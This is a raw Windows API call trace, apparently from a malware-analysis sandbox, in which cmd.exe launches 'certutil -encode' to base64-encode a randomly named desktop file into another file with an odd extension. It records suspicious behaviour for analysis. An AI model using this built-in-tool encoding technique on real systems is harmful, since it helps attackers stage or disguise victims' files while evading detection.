FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\VOv-CkMzVt4YRw.odp.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe895cef0, ftCreationTime.dwHighDateTime=0x1d5ee1a, ftLastAccessTime.dwLowDateTime=0x7dd32d20, ftLastAccessTime.dwHighDateTime=0x1d5e43c, ftLastWriteTime.dwLowDateTime=0x7dd32d20, ftLastWriteTime.dwHighDateTime=0x1d5e43c, nFileSizeHigh=0x0, nFileSizeLow=0xdded, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="VOv-CkMzVt4YRw.odp.Sister", cAlternateFileName="VOV-CK~1.SIS")) returned 0x21ed8c7d060 [0260.709] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0260.709] _wcsnicmp (_String1="VOV-CK~1.SIS", _String2="VOv-CkMzVt4YRw.odp.Sister", _MaxCount=0x19) returned 17 [0260.710] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0260.747] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0260.747] GetProcessHeap () returned 0x21ed8c70000 [0260.747] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8890 [0260.747] ??_V@YAXPEAX@Z () returned 0x1 [0260.747] ??_V@YAXPEAX@Z () returned 0x1 [0260.747] GetProcessHeap () returned 0x21ed8c70000 [0260.747] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ac90, Size=0x210) returned 0x21ed8d6ac90 [0260.747] GetProcessHeap () returned 0x21ed8c70000 [0260.747] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6ac90) returned 0x210 [0260.747] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0260.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0260.747] GetFileType (hFile=0x50) returned 0x2 [0260.748] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0260.748] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0260.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0260.822] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0260.968] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0260.968] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0260.968] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0260.968] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0260.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0260.969] GetFileType (hFile=0x50) returned 0x2 [0260.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0260.969] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0261.106] _get_osfhandle (_FileHandle=1) returned 0x50 [0261.106] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0261.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0261.227] GetFileType (hFile=0x50) returned 0x2 [0261.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0261.227] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0261.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0261.306] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d6ac30*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d6ac30*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0261.490] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\" ") returned 64 [0261.490] _get_osfhandle (_FileHandle=1) returned 0x50 [0261.490] GetFileType (hFile=0x50) returned 0x2 [0261.490] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0261.490] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0261.572] _get_osfhandle (_FileHandle=1) returned 0x50 [0261.572] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x40) returned 1 [0261.682] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0261.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0261.682] GetFileType (hFile=0x50) returned 0x2 [0261.682] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0261.682] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0261.761] _get_osfhandle (_FileHandle=1) returned 0x50 [0261.761] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0261.912] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0261.982] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0261.982] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0261.982] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0261.983] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0261.983] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0261.983] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0261.983] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0261.983] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0261.983] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0261.983] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0261.983] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0261.983] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0261.983] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0261.983] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0261.983] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0261.983] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0261.983] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0261.983] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0261.983] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0261.983] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0261.983] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0261.983] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0261.983] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0261.984] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0261.984] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0261.984] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0261.984] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0261.984] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0261.984] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0261.984] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0261.984] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0261.984] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0261.984] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0261.984] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0261.984] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0261.984] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0261.984] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0261.984] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0261.984] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0261.984] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0261.984] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0261.984] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0261.984] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0261.984] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0261.984] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0261.984] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0261.984] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0261.984] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0261.985] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0261.985] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0262.054] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0262.054] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0262.054] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0262.054] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0262.054] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0262.054] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0262.054] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0262.054] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0262.054] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0262.054] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0262.054] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0262.054] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0262.054] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0262.054] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0262.054] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0262.054] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0262.054] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0262.054] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0262.054] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0262.054] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0262.054] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0262.054] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0262.055] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0262.055] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0262.055] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0262.055] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0262.055] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0262.055] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0262.055] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0262.055] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0262.055] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0262.055] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0262.055] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0262.055] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0262.055] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0262.055] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0262.055] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0262.055] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0262.055] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0262.055] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0262.055] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0262.055] ??_V@YAXPEAX@Z () returned 0x1 [0262.055] GetProcessHeap () returned 0x21ed8c70000 [0262.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93c0dc0 [0262.056] GetProcessHeap () returned 0x21ed8c70000 [0262.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa2) returned 0x21ed8d45a20 [0262.056] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0262.056] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0262.056] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0262.056] GetProcessHeap () returned 0x21ed8c70000 [0262.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93d0db0 [0262.058] SetErrorMode (uMode=0x0) returned 0x0 [0262.058] SetErrorMode (uMode=0x1) returned 0x0 [0262.058] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93d0dc0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0262.058] SetErrorMode (uMode=0x0) returned 0x1 [0262.058] GetProcessHeap () returned 0x21ed8c70000 [0262.058] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93d0db0, Size=0x52) returned 0x21ed93d0db0 [0262.058] GetProcessHeap () returned 0x21ed8c70000 [0262.058] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93d0db0) returned 0x52 [0262.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0262.059] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0262.059] GetProcessHeap () returned 0x21ed8c70000 [0262.059] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937c930 [0262.059] GetProcessHeap () returned 0x21ed8c70000 [0262.059] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed93b0700 [0262.059] GetProcessHeap () returned 0x21ed8c70000 [0262.059] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0700, Size=0x1be) returned 0x21ed93b0700 [0262.059] GetProcessHeap () returned 0x21ed8c70000 [0262.059] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0700) returned 0x1be [0262.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0262.059] GetProcessHeap () returned 0x21ed8c70000 [0262.059] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8cc8410 [0262.059] GetProcessHeap () returned 0x21ed8c70000 [0262.059] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8410, Size=0x7e) returned 0x21ed8cc8410 [0262.059] GetProcessHeap () returned 0x21ed8c70000 [0262.059] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc8410) returned 0x7e [0262.059] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.060] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0262.060] GetLastError () returned 0x2 [0262.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.060] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0262.061] GetLastError () returned 0x2 [0262.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.061] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0262.061] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0262.061] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0262.062] GetLastError () returned 0x2 [0262.062] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cf40 [0262.062] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0262.062] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0262.062] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0262.062] ??_V@YAXPEAX@Z () returned 0x1 [0262.062] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0262.139] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0262.139] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0262.140] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0262.140] GetProcessHeap () returned 0x21ed8c70000 [0262.140] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e60 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0262.140] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0262.141] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0262.142] GetProcessHeap () returned 0x21ed8c70000 [0262.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e60) returned 1 [0262.142] GetProcessHeap () returned 0x21ed8c70000 [0262.142] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95940 [0262.142] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0262.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0262.142] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0262.226] _get_osfhandle (_FileHandle=0) returned 0x4c [0262.226] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0262.295] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xedc, dwThreadId=0xa84)) returned 1 [0262.308] CloseHandle (hObject=0xa4) returned 1 [0262.308] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0262.308] GetProcessHeap () returned 0x21ed8c70000 [0262.308] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0262.308] GetEnvironmentStringsW () returned 0x21ed8d44660* [0262.308] GetProcessHeap () returned 0x21ed8c70000 [0262.308] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0262.309] FreeEnvironmentStringsA (penv="=") returned 1 [0262.309] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0264.432] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0264.432] CloseHandle (hObject=0xa8) returned 1 [0264.433] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0264.433] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0264.433] GetProcessHeap () returned 0x21ed8c70000 [0264.433] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0264.433] GetEnvironmentStringsW () returned 0x21ed8d44660* [0264.433] GetProcessHeap () returned 0x21ed8c70000 [0264.433] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0264.433] FreeEnvironmentStringsA (penv="=") returned 1 [0264.433] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0264.433] GetProcessHeap () returned 0x21ed8c70000 [0264.433] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0264.434] GetEnvironmentStringsW () returned 0x21ed8d44660* [0264.434] GetProcessHeap () returned 0x21ed8c70000 [0264.434] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0264.434] FreeEnvironmentStringsA (penv="=") returned 1 [0264.434] GetProcessHeap () returned 0x21ed8c70000 [0264.434] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95940) returned 1 [0264.434] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0264.434] 